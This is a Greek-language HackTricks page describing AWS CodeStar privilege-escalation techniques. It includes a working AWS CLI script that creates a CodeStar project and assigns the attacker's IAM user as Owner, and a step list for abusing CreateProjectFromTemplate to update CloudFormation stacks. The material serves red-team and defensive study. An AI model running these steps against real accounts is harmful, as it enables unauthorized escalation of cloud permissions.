AWS - Codestar Privesc

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Codestar

Μπορείτε να βρείτε περισσότερες πληροφορίες σχετικά με το codestar στο:

codestar:CreateProject, codestar:AssociateTeamMember

iam:PassRole, codestar:CreateProject

Με αυτές τις άδειες μπορείτε να καταχραστείτε έναν ρόλο codestar IAM για να εκτελέσετε αυθαίρετες ενέργειες μέσω ενός προτύπου cloudformation. Ελέγξτε την παρακάτω σελίδα:

iam:PassRole, codestar:CreateProject

codestar:CreateProject, codestar:AssociateTeamMember

Αυτή η τεχνική χρησιμοποιεί το codestar:CreateProject για να δημιουργήσει ένα έργο codestar και το codestar:AssociateTeamMember για να καθορίσει έναν χρήστη IAM ως ιδιοκτήτη ενός νέου έργου CodeStar, το οποίο θα του παραχωρήσει μια νέα πολιτική με μερικές επιπλέον άδειες.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

Εάν είστε ήδη μέλος του έργου, μπορείτε να χρησιμοποιήσετε την άδεια codestar:UpdateTeamMember για να ενημερώσετε τον ρόλο σας σε ιδιοκτήτη αντί για codestar:AssociateTeamMember

Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στην πολιτική codestar που δημιουργήθηκε. Μπορείτε να βρείτε ένα παράδειγμα αυτής της πολιτικής στο:

codestar:CreateProject, codestar:AssociateTeamMember

codestar:CreateProjectFromTemplate

  1. Δημιουργία Νέου Έργου:

  • Χρησιμοποιήστε την ενέργεια codestar:CreateProjectFromTemplate για να ξεκινήσετε τη δημιουργία ενός νέου έργου.

  • Μετά την επιτυχή δημιουργία, αυτόματα παρέχεται πρόσβαση για το cloudformation:UpdateStack.

  • Αυτή η πρόσβαση στοχεύει ειδικά ένα stack που συσχετίζεται με τον ρόλο IAM CodeStarWorker-<γενικό όνομα έργου>-CloudFormation.

  1. Ενημέρωση του Στοχευμένου Stack:

  • Με τα παρεχόμενα δικαιώματα CloudFormation, προχωρήστε στην ενημέρωση του συγκεκριμένου stack.

  • Το όνομα του stack συνήθως ακολουθεί έναν από τους δύο παρακάτω προτύπους:

  • awscodestar-<γενικό όνομα έργου>-infrastructure

  • awscodestar-<γενικό όνομα έργου>-lambda

  • Το ακριβές όνομα εξαρτάται από το επιλεγμένο πρότυπο (αναφέροντας το παράδειγμα του εκμεταλλευτικού σεναρίου).

  1. Πρόσβαση και Δικαιώματα:

  • Μετά την ενημέρωση, αποκτάτε τις δυνατότητες που έχουν ανατεθεί στον ρόλο IAM του CloudFormation που συσχετίζεται με το stack.

  • Σημείωση: Αυτό δεν παρέχει από μόνο του πλήρη δικαιώματα διαχειριστή. Μπορεί να απαιτηθούν επιπλέον μη παραμετροποιημένοι πόροι εντός του περιβάλλοντος για να αναβαθμίσετε περαιτέρω τα δικαιώματα.

Για περισσότερες πληροφορίες, ανατρέξτε στην αρχική έρευνα: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Μπορείτε να βρείτε το εκμεταλλευτικό σενάριο στο https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Πιθανές Επιπτώσεις: Ανέβασμα δικαιωμάτων στον ρόλο cloudformation IAM.

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated